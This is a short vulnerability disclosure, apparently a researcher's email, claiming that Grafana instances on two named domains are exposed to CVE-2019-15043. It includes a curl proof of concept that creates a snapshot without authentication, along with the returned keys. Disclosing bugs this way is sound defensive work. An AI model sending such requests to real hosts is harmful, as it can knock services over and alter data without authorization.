HEY SECURITY TEAM,
I'm Security Researcher
I have found a critical vulnerability at one of your domain that is cve-2019-15043 which can led to DDOS attack and can make system go down by grafana snapshot instance
Vuln url: https://grafana.opendev.org/api/snapshots https://grafana.quiknode.io/api/snapshots
POC:
root@kali:/home/kali# curl -s XPOST https://grafana.opendev.org/api/snapshots -H "Accept: application/json" -H "Content-Type: application/json" -d '{"dashboard": {}}' | json_pp
{ "deleteKey" : "6mYFALwQmmpImHeKS30XtFw8ogmoHaSm", "deleteUrl" : " http://localhost:3000/api/snapshots-delete/6mYFALwQmmpImHeKS30XtFw8ogmoHaSm ", "key" : "91H6lcVrwiivMuW1H2iAKcUsZwYU2xfO", "url" : " http://localhost:3000/dashboard/snapshot/91H6lcVrwiivMuW1H2iAKcUsZwYU2xfO" }
for more reference - https://aaron-hoffmann.com/blog/cve-2019-15043/
Fix it to latest grafana instance
Best Regards,
Divya Singh - @Dgirlwhohacks